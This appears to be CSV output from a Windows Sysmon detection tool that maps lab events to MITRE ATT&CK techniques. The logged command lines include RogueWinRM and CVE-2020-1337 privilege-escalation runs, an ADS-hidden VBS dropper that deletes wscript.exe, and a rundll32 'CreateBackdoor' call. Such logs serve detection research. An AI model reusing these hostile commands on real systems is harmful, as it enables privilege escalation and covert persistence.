2020-05-24 01:13:50.301 + 747F3D96-CA4E-5EC9-0000-00109FE23700 + 1516 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + c:\Windows\System32\cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-BDD1-5EC9-0000-0020E7030000 + 0x3e7 + 1 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-CA4B-5EC9-0000-0010B8CB3700 + 3960 + C:\Users\IEUser\Tools\PrivEsc\RogueWinRM.exe + RogueWinRM.exe -p c:\Windows\System32\cmd.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1561018068.909935,2019-06-20T12:07:48.909935+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8114 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-20 08:07:48.894 + 365ABB72-3ED4-5D0B-0000-00106C871A00 + 888 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "cmd" + c:\ProgramData\ + IEWIN7\IEUser + 365ABB72-3991-5D0B-0000-002029350100 + 0x13529 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-3D05-5D0B-0000-001004220D00 + 816 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237564.051227,2020-08-12T17:06:04.051227+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342413 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:02.548 + 747F3D96-E93A-5F33-0000-001014B30E00 + 7868 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c copy Report.wer C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E938-5F33-0000-00109CA00E00 + 7820 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe + WerTrigger.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557370343.500263,2019-05-09T06:52:23.500263+04:00,,Threat,Low,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /C "echo Dim objShell:Dim oFso:Set oFso = CreateObject("Scripting.FileSystemObject"):Set objShell = WScript.CreateObject("WScript.Shell"):command = "powershell.exe":objShell.Run command, 0:command = "C:\Windows\System32\cmd.exe /c ""start /b """" cmd /c ""timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest""""":objShell.Run command, 0:Set objShell = Nothing > "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11238 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 02:52:23.484 + 365ABB72-95E7-5CD3-0000-001046950F00 + 2812 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /C "echo Dim objShell:Dim oFso:Set oFso = CreateObject("Scripting.FileSystemObject"):Set objShell = WScript.CreateObject("WScript.Shell"):command = "powershell.exe":objShell.Run command, 0:command = "C:\Windows\System32\cmd.exe /c ""start /b """" cmd /c ""timeout /t 5 >nul&&del C:\Windows\wscript.exe&&del C:\Windows\wscript.exe.manifest""""":objShell.Run command, 0:Set objShell = Nothing > "C:\Users\IEUser\AppData:tghjx5xz2ky.vbs"" + C:\Users\IEUser\AppData\Local\Temp\onedrive\ + IEWIN7\IEUser + 365ABB72-94CD-5CD3-0000-0020DD3A0100 + 0x13add + 1 + Medium + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-9570-5CD3-0000-00103FC90A00 + 1900 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 423994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.012 + 747F3D96-51D0-5F93-0000-001036A15B00 + 3396 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51CD-5F93-0000-001073735B00 + 7624 + C:\Users\Public\test.tmp + c:\Users\Public\test.tmp + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 423994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.012 + 747F3D96-51D0-5F93-0000-001036A15B00 + 3396 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51CD-5F93-0000-001073735B00 + 7624 + C:\Users\Public\test.tmp + c:\Users\Public\test.tmp + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1603490256.025174,2020-10-24T01:57:36.025174+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 423994 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:36.012 + 747F3D96-51D0-5F93-0000-001036A15B00 + 3396 + C:\Windows\SysWOW64\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + "C:\Windows\System32\rundll32.exe" conf3234.dll f8753 d948 + C:\Users\IEUser\AppData\Local\Temp\tmp1375\ + MSEDGEWIN10\IEUser + 747F3D96-4690-5F93-0000-002085A50800 + 0x8a585 + 1 + High + SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B + 747F3D96-51CD-5F93-0000-001073735B00 + 7624 + C:\Users\Public\test.tmp + c:\Users\Public\test.tmp + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1584766840.502366,2020-03-21T09:00:40.502366+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243568 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:39.417 + 747F3D96-9F77-5E75-0000-001090F32000 + 2416 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-9F61-5E75-0000-0010686A1E00 + 4848 + C:\Windows\System32\rundll32.exe + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237563.487498,2020-08-12T17:06:03.487498+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342412 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:01.636 + 747F3D96-E939-5F33-0000-0010ACAB0E00 + 7852 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c mkdir,C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E938-5F33-0000-00109CA00E00 + 7820 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe + WerTrigger.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Detect IIS/Exchange Exploitation,1558885676.667118,2019-05-26T19:47:56.667118+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\notepad.exe) and commandline ( C:\Windows\System32\notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5408 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-26 15:47:56.627 + 365ABB72-B52C-5CEA-0000-00107A0D1100 + 3388 + C:\Windows\System32\notepad.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Notepad + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\System32\notepad.exe + c:\windows\system32\inetsrv\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=FC64B1EF19E7F35642B2A2EA5F5D9F4246866243,MD5=A4F6DF0E33E644E802C8798ED94D80EA,SHA256=B56AFE7165AD341A749D2D3BD925D879728A1FE4A4DF206145C1A69AA233F68B,IMPHASH=53A6715F589E88C4FD4541C81B4F57C3 + 365ABB72-B26B-5CEA-0000-0010582A0800 + 2744 + C:\Windows\System32\inetsrv\w3wp.exe + c:\windows\system32\inetsrv\w3wp.exe -ap "DefaultAppPool" -v "v2.0" -l "webengine4.dll" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h "C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config" -w "" -m 0 -t 20 + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1579034897.447948,2020-01-15T00:48:17.447948+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 345 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:17.270 + 747F3D96-2911-5E1E-0000-0010D80A7D00 + 2416 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "cmd.exe" /c notepad.exe + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2910-5E1E-0000-002082EF7C00 + 0x7cef82 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2910-5E1E-0000-001053F57C00 + 4448 + C:\Windows\System32\cmd.exe + cmd.exe /c start ms-browser:// + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564909835.391457,2019-08-04T13:10:35.391457+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5703 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-04 09:10:30.702 + 747F3D96-A106-5D46-0000-00102425BD03 + 6604 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-56A3-5D45-0000-0020B3D31800 + 0x18d3b3 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-A106-5D46-0000-00107201BD03 + 1380 + C:\Windows\System32\control.exe + "C:\Windows\System32\control.exe" /name Microsoft.BackupAndRestoreCenter + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1597237562.552084,2020-08-12T17:06:02.552084+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 342411 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-08-12 13:06:00.734 + 747F3D96-E938-5F33-0000-00101CA50E00 + 7836 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + C:\Windows\system32\cmd.exe /c rmdir /s/q C:\ProgramData\Microsoft\Windows\WER\ReportQueue\a_b_c_d_e > nul 2>&1 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\ + MSEDGEWIN10\IEUser + 747F3D96-E911-5F33-0000-0020241C0400 + 0x41c24 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-E938-5F33-0000-00109CA00E00 + 7820 + C:\Users\Public\tools\PrivEsc\cve-2020-1337-poc-master\WerTrigger.exe + WerTrigger.exe + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 344 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:16.990 + 747F3D96-2910-5E1E-0000-001053F57C00 + 4448 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /c start ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2910-5E1E-0000-002082EF7C00 + 0x7cef82 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 344 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:16.990 + 747F3D96-2910-5E1E-0000-001053F57C00 + 4448 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /c start ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2910-5E1E-0000-002082EF7C00 + 0x7cef82 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034897.412145,2020-01-15T00:48:17.412145+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c start ms-browser:// ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 344 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-01-14 20:48:16.990 + 747F3D96-2910-5E1E-0000-001053F57C00 + 4448 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd.exe /c start ms-browser:// + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-2910-5E1E-0000-002082EF7C00 + 0x7cef82 + 0 + High + SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-2910-5E1E-0000-0010F5F07C00 + 4612 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1557970296.456891,2019-05-16T05:31:36.456891+04:00,,Threat,Low,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /C ipconfig ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 17985 + + + + + Microsoft-Windows-Sysmon/Operational + DC1.insecurebank.local + + + + + + 2019-05-16 01:31:36.443 + DFAE8213-BD78-5CDC-0000-001091041300 + 3136 + C:\Windows\System32\cmd.exe + 6.3.9600.16384 (winblue_rtm.130821-1623) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /C ipconfig + C:\Users\administrator\ + insecurebank\Administrator + DFAE8213-BD78-5CDC-0000-002005FE1200 + 0x12fe05 + 0 + High + SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3 + DFAE8213-BD78-5CDC-0000-0010C7FE1200 + 3948 + C:\Windows\System32\winrshost.exe + C:\Windows\system32\WinrsHost.exe -Embedding + +",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational +[T1082] System Information Discovery,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) ith commandline ( "C:\Windows\system32\whoami.exe" /all) ,1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8050 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-29 20:59:22.128 + 365ABB72-65AA-5CC7-0000-00104D882400 + 2116 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /all + C:\Users\IEUser\Documents\ + IEWIN7\IEUser + 365ABB72-5B3A-5CC7-0000-002096080100 + 0x10896 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-65A9-5CC7-0000-00104E5C2400 + 3376 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1556571562.144046,2019-04-30T00:59:22.144046+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\system32\whoami.exe" /all ) contain suspicious command ( whoami.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8050 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-04-29 20:59:22.128 + 365ABB72-65AA-5CC7-0000-00104D882400 + 2116 + C:\Windows\System32\whoami.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + whoami - displays logged on user information + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\whoami.exe" /all + C:\Users\IEUser\Documents\ + IEWIN7\IEUser + 365ABB72-5B3A-5CC7-0000-002096080100 + 0x10896 + 1 + High + SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274 + 365ABB72-65A9-5CC7-0000-00104E5C2400 + 3376 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +Command run remotely Using WMI,1603490254.745175,2020-10-24T01:57:34.745175+04:00,,Threat,Critical,User (NT AUTHORITY\NETWORK SERVICE) run command through WMI with process (C:\Windows\System32\wbem\WmiPrvSE.exe) and commandline ( C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 423991 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-23 21:57:29.192 + 747F3D96-51C9-5F93-0000-001010175B00 + 8796 + C:\Windows\System32\wbem\WmiPrvSE.exe + 10.0.17763.1 (WinBuild.160101.0800) + WMI Provider Host + Microsoft® Windows® Operating System + Microsoft Corporation + Wmiprvse.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + C:\Windows\system32\ + NT AUTHORITY\NETWORK SERVICE + 747F3D96-C50A-5F93-0000-0020E4030000 + 0x3e4 + 0 + System + SHA1=67C25C8F28B5FA7F5BAA85BF1D2726AED48E9CF0,MD5=06C66FF5CCDC2D22344A3EB761A4D38A,SHA256=B5C78BEF3883E3099F7EF844DA1446DB29107E5C0223B97F29E7FAFAB5527F15,IMPHASH=CFECEDC01015A4FD1BAACAC9E592D88B + 00000000-0000-0000-0000-000000000000 + 836 + ? + ? + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.569133,2020-03-21T09:00:25.569133+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243565 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.544 + 747F3D96-9F69-5E75-0000-0010729F2000 + 3536 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + 